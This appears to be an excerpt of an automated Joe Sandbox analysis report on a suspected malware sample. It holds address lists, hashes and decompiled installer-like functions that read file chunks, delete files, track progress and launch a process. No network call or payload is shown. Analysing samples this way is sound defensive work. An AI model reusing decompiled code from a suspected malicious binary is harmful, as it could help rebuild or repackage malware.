                                                                                              0x004072c8
                                                                                              0x004072cb
                                                                                              0x004072ce
                                                                                              0x004072d1
                                                                                              0x004072d4
                                                                                              0x004072d7
                                                                                              0x004072f0
                                                                                              0x004072f2
                                                                                              0x004072f5
                                                                                              0x004072f6
                                                                                              0x004072f9
                                                                                              0x004072fb
                                                                                              0x004072fe
                                                                                              0x00407300
                                                                                              0x00407302
                                                                                              0x00407305
                                                                                              0x00407307
                                                                                              0x0040730a
                                                                                              0x0040730e
                                                                                              0x00407310
                                                                                              0x00407310
                                                                                              0x00407311
                                                                                              0x00407314
                                                                                              0x00407317
                                                                                              0x004072d9
                                                                                              0x004072d9
                                                                                              0x004072e1
                                                                                              0x004072e6
                                                                                              0x004072e8
                                                                                              0x004072eb
                                                                                              0x004072eb
                                                                                              0x0040731a
                                                                                              0x00407321
                                                                                              0x004072ab
                                                                                              0x004072ab
                                                                                              0x004072ab
                                                                                              0x004072ab
                                                                                              0x00000000
                                                                                              0x00407323
                                                                                              0x00000000
                                                                                              0x00407323
                                                                                              0x00407321
                                                                                              0x00407234
                                                                                              0x00407237
                                                                                              0x00407239
                                                                                              0x0040723c
                                                                                              0x0040723f
                                                                                              0x00407242
                                                                                              0x00407244
                                                                                              0x00407247
                                                                                              0x0040724a
                                                                                              0x0040724a
                                                                                              0x0040724d
                                                                                              0x0040724d
                                                                                              0x00407250
                                                                                              0x00407257
                                                                                              0x0040722b
                                                                                              0x0040722b
                                                                                              0x0040722b
                                                                                              0x0040722b
                                                                                              0x00000000
                                                                                              0x00407259
                                                                                              0x00000000
                                                                                              0x00407259
                                                                                              0x00407257
                                                                                              0x004071dd
                                                                                              0x004071e0
                                                                                              0x004071e2
                                                                                              0x004071e5
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406f44
                                                                                              0x00406f44
                                                                                              0x00406f48
                                                                                              0x0040758d
                                                                                              0x00000000
                                                                                              0x0040758d
                                                                                              0x00406f4e
                                                                                              0x00406f51
                                                                                              0x00406f54
                                                                                              0x00406f57
                                                                                              0x00406f5a
                                                                                              0x00406f5d
                                                                                              0x00406f60
                                                                                              0x00406f62
                                                                                              0x00406f65
                                                                                              0x00406f68
                                                                                              0x00406f6b
                                                                                              0x00406f6d
                                                                                              0x00406f6d
                                                                                              0x00406f6d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004070cf
                                                                                              0x004070cf
                                                                                              0x004070d3
                                                                                              0x00407599
                                                                                              0x00000000
                                                                                              0x00407599
                                                                                              0x004070d9
                                                                                              0x004070dc
                                                                                              0x004070df
                                                                                              0x004070e2
                                                                                              0x004070e4
                                                                                              0x004070e4
                                                                                              0x004070e4
                                                                                              0x004070e7
                                                                                              0x004070ea
                                                                                              0x004070ed
                                                                                              0x004070f0
                                                                                              0x004070f3
                                                                                              0x004070f6
                                                                                              0x004070f7
                                                                                              0x004070f9
                                                                                              0x004070f9
                                                                                              0x004070f9
                                                                                              0x004070fc
                                                                                              0x004070ff
                                                                                              0x00407102
                                                                                              0x00407105
                                                                                              0x00407105
                                                                                              0x00407105
                                                                                              0x00407108
                                                                                              0x0040710a
                                                                                              0x0040710a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040734c
                                                                                              0x0040734c
                                                                                              0x0040734c
                                                                                              0x00407350
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407356
                                                                                              0x00407359
                                                                                              0x0040735c
                                                                                              0x0040735f
                                                                                              0x00407361
                                                                                              0x00407361
                                                                                              0x00407361
                                                                                              0x00407364
                                                                                              0x00407367
                                                                                              0x0040736a
                                                                                              0x0040736d
                                                                                              0x00407370
                                                                                              0x00407373
                                                                                              0x00407374
                                                                                              0x00407376
                                                                                              0x00407376
                                                                                              0x00407376
                                                                                              0x00407379
                                                                                              0x0040737c
                                                                                              0x0040737f
                                                                                              0x00407382
                                                                                              0x00407385
                                                                                              0x00407389
                                                                                              0x0040738b
                                                                                              0x0040738e
                                                                                              0x00000000
                                                                                              0x00407390
                                                                                              0x0040710d
                                                                                              0x0040710d
                                                                                              0x00000000
                                                                                              0x0040710d
                                                                                              0x0040738e
                                                                                              0x004075c3
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406bf2
                                                                                              0x004075fa
                                                                                              0x004075fa
                                                                                              0x00000000
                                                                                              0x004075fa
                                                                                              0x00407447
                                                                                              0x004073ce
                                                                                              0x004073cb

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.319378682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.319372400.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319385831.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319466753.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                                                                              • Instruction ID: 947ff9f4813c08031b822263453b6bbc7859602ae013fffc9a74d3363ad91bbb
                                                                                              • Opcode Fuzzy Hash: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                                                                              • Instruction Fuzzy Hash: FE713471E04228DBEF28CF98C8547ADBBB1FF44305F15806AD856BB281C778A986DF45
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00403479 Relevance: 4.6, APIs: 3, Instructions: 101COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 93%
                                                                                              			E00403479(intOrPtr _a4) {
				intOrPtr _t11;
				signed int _t12;
				void* _t14;
				void* _t15;
				long _t16;
				void* _t18;
				intOrPtr _t31;
				intOrPtr _t34;
				intOrPtr _t36;
				void* _t37;
				intOrPtr _t49;

				_t34 =  *0x420ef4 -  *0x40ce60 + _a4;
				 *0x42a26c = GetTickCount() + 0x1f4;
				if(_t34 <= 0) {
					L22:
					E0040302E(1);
					return 0;
				}
				E004035F8( *0x420f04);
				SetFilePointer( *0x40a01c,  *0x40ce60, 0, 0); // executed
				 *0x420f00 = _t34;
				 *0x420ef0 = 0;
				while(1) {
					_t31 = 0x4000;
					_t11 =  *0x420ef8 -  *0x420f04;
					if(_t11 <= 0x4000) {
						_t31 = _t11;
					}
					_t12 = E004035E2(0x414ef0, _t31);
					if(_t12 == 0) {
						break;
					}
					 *0x420f04 =  *0x420f04 + _t31;
					 *0x40ce80 = 0x414ef0;
					 *0x40ce84 = _t31;
					L6:
					L6:
					if( *0x42a270 != 0 &&  *0x42a300 == 0) {
						 *0x420ef0 =  *0x420f00 -  *0x420ef4 - _a4 +  *0x40ce60;
						E0040302E(0);
					}
					 *0x40ce88 = 0x40cef0;
					 *0x40ce8c = 0x8000; // executed
					_t14 = E00406BB0(0x40ce68); // executed
					if(_t14 < 0) {
						goto L20;
					}
					_t36 =  *0x40ce88; // 0x40f550
					_t37 = _t36 - 0x40cef0;
					if(_t37 == 0) {
						__eflags =  *0x40ce84; // 0x0
						if(__eflags != 0) {
							goto L20;
						}
						__eflags = _t31;
						if(_t31 == 0) {
							goto L20;
						}
						L16:
						_t16 =  *0x420ef4;
						if(_t16 -  *0x40ce60 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
						goto L22;
					}
					_t18 = E0040620A( *0x40a01c, 0x40cef0, _t37); // executed
					if(_t18 == 0) {
						_push(0xfffffffe);
						L21:
						_pop(_t15);
						return _t15;
					}
					 *0x40ce60 =  *0x40ce60 + _t37;
					_t49 =  *0x40ce84; // 0x0
					if(_t49 != 0) {
						goto L6;
					}
					goto L16;
					L20:
					_push(0xfffffffd);
					goto L21;
				}
				return _t12 | 0xffffffff;
			}














                                                                                              0x00403489
                                                                                              0x0040349c
                                                                                              0x004034a1
                                                                                              0x004035d1
                                                                                              0x004035d3
                                                                                              0x00000000
                                                                                              0x004035d9
                                                                                              0x004034ad
                                                                                              0x004034c0
                                                                                              0x004034c6
                                                                                              0x004034cc
                                                                                              0x004034d7
                                                                                              0x004034dc
                                                                                              0x004034e1
                                                                                              0x004034e9
                                                                                              0x004034eb
                                                                                              0x004034eb
                                                                                              0x004034f4
                                                                                              0x004034fb
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403501
                                                                                              0x00403507
                                                                                              0x0040350d
                                                                                              0x00000000
                                                                                              0x00403513
                                                                                              0x00403519
                                                                                              0x00403539
                                                                                              0x0040353e
                                                                                              0x00403543
                                                                                              0x00403549
                                                                                              0x0040354f
                                                                                              0x00403559
                                                                                              0x00403560
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403562
                                                                                              0x00403568
                                                                                              0x0040356a
                                                                                              0x0040358d
                                                                                              0x00403593
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403595
                                                                                              0x00403597
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403599
                                                                                              0x00403599
                                                                                              0x004035ac
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004035bb
                                                                                              0x00000000
                                                                                              0x004035bb
                                                                                              0x00403574
                                                                                              0x0040357b
                                                                                              0x004035c8
                                                                                              0x004035ce
                                                                                              0x004035ce
                                                                                              0x00000000
                                                                                              0x004035ce
                                                                                              0x0040357d
                                                                                              0x00403583
                                                                                              0x00403589
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004035cc
                                                                                              0x004035cc
                                                                                              0x00000000
                                                                                              0x004035cc
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • GetTickCount.KERNEL32 ref: 0040348D
                                                                                                • Part of subcall function 004035F8: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 004034C0
                                                                                              • SetFilePointer.KERNELBASE(?,00000000,00000000,00414EF0,00004000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000), ref: 004035BB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.319378682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.319372400.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319385831.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319466753.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                              Similarity
                                                                                              • API ID: FilePointer$CountTick
                                                                                              • String ID:
                                                                                              • API String ID: 1092082344-0
                                                                                              • Opcode ID: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                                                                                              • Instruction ID: 4a0f782daef8a724a5dada35133bb9654e3c612a62d69fcdf17392b9264be50a
                                                                                              • Opcode Fuzzy Hash: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                                                                                              • Instruction Fuzzy Hash: 3A31AEB2650205EFC7209F29EE848263BADF70475A755023BE900B22F1C7B59D42DB9D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405D2C Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 41%
                                                                                              			E00405D2C(void* __eflags, WCHAR* _a4, signed int _a8) {
				int _t9;
				long _t13;
				WCHAR* _t14;

				_t14 = _a4;
				_t13 = E00406133(_t14);
				if(_t13 == 0xffffffff) {
					L8:
					return 0;
				}
				_push(_t14);
				if((_a8 & 0x00000001) == 0) {
					_t9 = DeleteFileW();
				} else {
					_t9 = RemoveDirectoryW(); // executed
				}
				if(_t9 == 0) {
					if((_a8 & 0x00000004) == 0) {
						SetFileAttributesW(_t14, _t13);
					}
					goto L8;
				} else {
					return 1;
				}
			}






                                                                                              0x00405d2d
                                                                                              0x00405d38
                                                                                              0x00405d3d
                                                                                              0x00405d6d
                                                                                              0x00000000
                                                                                              0x00405d6d
                                                                                              0x00405d44
                                                                                              0x00405d45
                                                                                              0x00405d4f
                                                                                              0x00405d47
                                                                                              0x00405d47
                                                                                              0x00405d47
                                                                                              0x00405d57
                                                                                              0x00405d63
                                                                                              0x00405d67
                                                                                              0x00405d67
                                                                                              0x00000000
                                                                                              0x00405d59
                                                                                              0x00000000
                                                                                              0x00405d5b

                                                                                              APIs
                                                                                                • Part of subcall function 00406133: GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
                                                                                                • Part of subcall function 00406133: SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040614C
                                                                                              • RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405F0E), ref: 00405D47
                                                                                              • DeleteFileW.KERNEL32(?,?,?,00000000,00405F0E), ref: 00405D4F
                                                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D67
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.319378682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.319372400.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319385831.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319466753.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Attributes$DeleteDirectoryRemove
                                                                                              • String ID:
                                                                                              • API String ID: 1655745494-0
                                                                                              • Opcode ID: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                                                                                              • Instruction ID: f7500ddcb6900c42920b0fa7cdf939b3a50fd8fb6693fff67202f671924a8b23
                                                                                              • Opcode Fuzzy Hash: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                                                                                              • Instruction Fuzzy Hash: 6DE0E531218A9156C3207734AD0CB5B2A98EF86314F09893FF5A2B11E0D77885078AAD
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00406AE0 Relevance: 4.5, APIs: 3, Instructions: 27synchronizationCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00406AE0(void* __ecx, void* _a4) {
				long _v8;
				long _t6;

				_t6 = WaitForSingleObject(_a4, 0x64);
				while(_t6 == 0x102) {
					E00406A71(0xf);
					_t6 = WaitForSingleObject(_a4, 0x64);
				}
				GetExitCodeProcess(_a4,  &_v8); // executed
				return _v8;
			}





                                                                                              0x00406af1
                                                                                              0x00406b08
                                                                                              0x00406afc
                                                                                              0x00406b06
                                                                                              0x00406b06
                                                                                              0x00406b13
                                                                                              0x00406b1f

                                                                                              APIs
                                                                                              • WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
                                                                                              • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00406B06
                                                                                              • GetExitCodeProcess.KERNELBASE ref: 00406B13
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.319378682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.319372400.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319385831.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319466753.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                              Similarity
                                                                                              • API ID: ObjectSingleWait$CodeExitProcess
                                                                                              • String ID:
                                                                                              • API String ID: 2567322000-0
                                                                                              • Opcode ID: c0daa64154bb0774b0f48346674b492318025e1df3185352ae56c24ee987a067
                                                                                              • Instruction ID: dffe0f0baa3edeb4a8159ab808a8d66eaa88359a938bc324e0f181ad12cbd91f
                                                                                              • Opcode Fuzzy Hash: c0daa64154bb0774b0f48346674b492318025e1df3185352ae56c24ee987a067
                                                                                              • Instruction Fuzzy Hash: 36E09236600118FBDB00AB54DD05E9E7B6ADB45704F114036FA05B6190C6B1AE22DA94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00403371 Relevance: 3.1, APIs: 2, Instructions: 88COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 92%
                                                                                              			E00403371(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
				long _v8;
				long _t21;
				long _t22;
				void* _t24;
				long _t26;
				int _t27;
				long _t28;
				void* _t29;
				void* _t30;
				long _t31;
				long _t32;
				long _t36;

				_t21 = _a4;
				if(_t21 >= 0) {
					_t32 = _t21 +  *0x42a2b8;
					 *0x420ef4 = _t32;
					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
				}
				_t22 = E00403479(4);
				if(_t22 >= 0) {
					_t24 = E004061DB( *0x40a01c,  &_a4, 4); // executed
					if(_t24 == 0) {
						L18:
						_push(0xfffffffd);
						goto L19;
					} else {
						 *0x420ef4 =  *0x420ef4 + 4;
						_t36 = E00403479(_a4);
						if(_t36 < 0) {
							L21:
							_t22 = _t36;
						} else {
							if(_a12 != 0) {
								_t26 = _a4;
								if(_t26 >= _a16) {
									_t26 = _a16;
								}
								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
								if(_t27 != 0) {
									_t36 = _v8;
									 *0x420ef4 =  *0x420ef4 + _t36;
									goto L21;
								} else {
									goto L18;
								}
							} else {
								if(_a4 <= 0) {
									goto L21;
								} else {
									while(1) {
										_t28 = _a4;
										if(_a4 >= 0x4000) {
											_t28 = 0x4000;
										}
										_v8 = _t28;
										_t29 = E004061DB( *0x40a01c, 0x414ef0, _t28); // executed
										if(_t29 == 0) {
											goto L18;
										}
										_t30 = E0040620A(_a8, 0x414ef0, _v8); // executed
										if(_t30 == 0) {
											_push(0xfffffffe);
											L19:
											_pop(_t22);
										} else {
											_t31 = _v8;
											_a4 = _a4 - _t31;
											 *0x420ef4 =  *0x420ef4 + _t31;
											_t36 = _t36 + _t31;
											if(_a4 > 0) {
												continue;
											} else {
												goto L21;
											}
										}
										goto L22;
									}
									goto L18;
								}
							}
						}
					}
				}
				L22:
				return _t22;
			}















                                                                                              0x00403375
                                                                                              0x0040337e
                                                                                              0x00403387
                                                                                              0x0040338b
                                                                                              0x00403396
                                                                                              0x00403396
                                                                                              0x0040339e
                                                                                              0x004033a5
                                                                                              0x004033b7
                                                                                              0x004033be
                                                                                              0x00403463
                                                                                              0x00403463
                                                                                              0x00000000
                                                                                              0x004033c4
                                                                                              0x004033c7
                                                                                              0x004033d3
                                                                                              0x004033d7
                                                                                              0x00403471
                                                                                              0x00403471
                                                                                              0x004033dd
                                                                                              0x004033e0
                                                                                              0x0040343f
                                                                                              0x00403445
                                                                                              0x00403447
                                                                                              0x00403447
                                                                                              0x00403459
                                                                                              0x00403461
                                                                                              0x00403468
                                                                                              0x0040346b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004033e2
                                                                                              0x004033e5
                                                                                              0x00000000
                                                                                              0x004033eb
                                                                                              0x004033f0
                                                                                              0x004033f7
                                                                                              0x004033fa
                                                                                              0x004033fc
                                                                                              0x004033fc
                                                                                              0x00403409
                                                                                              0x0040340c
                                                                                              0x00403413
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040341c
                                                                                              0x00403423
                                                                                              0x0040343b
                                                                                              0x00403465
                                                                                              0x00403465
                                                                                              0x00403425
                                                                                              0x00403425
                                                                                              0x00403428
                                                                                              0x0040342b
                                                                                              0x00403431
                                                                                              0x00403437
                                                                                              0x00000000
                                                                                              0x00403439
                                                                                              0x00000000
                                                                                              0x00403439
                                                                                              0x00403437
                                                                                              0x00000000
                                                                                              0x00403423
                                                                                              0x00000000
                                                                                              0x004033f0
                                                                                              0x004033e5
                                                                                              0x004033e0
                                                                                              0x004033d7
                                                                                              0x004033be
                                                                                              0x00403473
                                                                                              0x00403476

                                                                                              APIs
                                                                                              • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 00403396
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.319378682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.319372400.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319385831.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319466753.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                              Similarity
                                                                                              • API ID: FilePointer
                                                                                              • String ID:
                                                                                              • API String ID: 973152223-0
                                                                                              • Opcode ID: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                                                                                              • Instruction ID: 963a71f16df831595788c30304fa9cedbf2cad19eb63879c1ada4fe15c9ed8fa
                                                                                              • Opcode Fuzzy Hash: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                                                                                              • Instruction Fuzzy Hash: 93319F70200219EFDB129F65ED84E9A3FA8FF00355B10443AF905EA1A1D778CE51DBA9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 69%
                                                                                              			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42a290;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42924c =  *0x42924c + _t12;
						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x42924c, 0x7530,  *0x429234), 0);
					}
				}
				return 0;
			}











                                                                                              0x0040138a
                                                                                              0x004013fa
                                                                                              0x0040139b
                                                                                              0x004013a0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004013a2
                                                                                              0x004013a3
                                                                                              0x004013ad
                                                                                              0x00000000
                                                                                              0x00401404
                                                                                              0x004013b0
                                                                                              0x004013b7
                                                                                              0x004013bd
                                                                                              0x004013be
                                                                                              0x004013c0
                                                                                              0x004013c2
                                                                                              0x004013b9
                                                                                              0x004013b9
                                                                                              0x004013ba
                                                                                              0x004013ba
                                                                                              0x004013c9
                                                                                              0x004013cb
                                                                                              0x004013f4
                                                                                              0x004013f4
                                                                                              0x004013c9
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                              • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.319378682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.319372400.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319385831.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319466753.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 3850602802-0
                                                                                              • Opcode ID: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                                                                                              • Instruction ID: af17251ef12b8b272b5eaf8d1bef107274ce64b6e67bb2dd4604cf2723900e86
                                                                                              • Opcode Fuzzy Hash: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                                                                                              • Instruction Fuzzy Hash: 6F012831724220EBEB295B389D05B6A3698E710714F10857FF855F76F1E678CC029B6D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405C4B Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00405C4B(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x426750->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x426750,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                                                              0x00405c54
                                                                                              0x00405c74
                                                                                              0x00405c7c
                                                                                              0x00405c81
                                                                                              0x00000000
                                                                                              0x00405c87
                                                                                              0x00405c8b

                                                                                              APIs
                                                                                              Memory Dump Source
